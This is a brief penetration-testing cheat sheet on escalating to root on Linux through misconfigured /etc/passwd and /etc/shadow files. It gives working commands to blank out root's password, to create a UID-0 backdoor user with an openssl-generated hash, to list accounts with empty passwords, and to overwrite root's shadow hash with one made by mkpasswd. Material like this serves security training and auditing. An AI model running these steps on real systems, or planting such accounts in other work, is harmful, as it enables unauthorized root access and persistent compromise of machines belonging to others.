/etc/passwd & /etc/shadow

/etc/passwd readible - root no password ?

No x ?

$ head -n 1 /etc/passwd

root::0:0:root:/root:/bin/bash

$ su

/etc/passwd writable

Change root line (remove x):

Before:

root:x:0:0:root:/root:/bin/bash

After:

root::0:0:root:/root:/bin/bash

Capabilities

Create new user

1. Create a password hash: openssl passwd -1 -salt [salt] [password] Ex: openssl passwd -1 -salt new 123 $1$new$p7ptkEKU1HnaHpRtzNizS1

2. Add an new entry to /etc/passwd : Ex: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

3. Switch to the new user su new password: 123 id uid=0(new) gid=0(root) groups=0(root)

Editing /etc/passwd File for Privilege Escalation - Hacking ArticlesHacking Articles

/etc/shadow readible

Crack hashes

Cracking

Users with no password

awk -F: '($2=="") {print $1}' /etc/shadow

/etc/shadow writable

1. Generate a new password hash with a password of your choice: mkpasswd -m sha-512 newpasswordhere

2. Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

3. Switch to the root user, using the new password:

   su root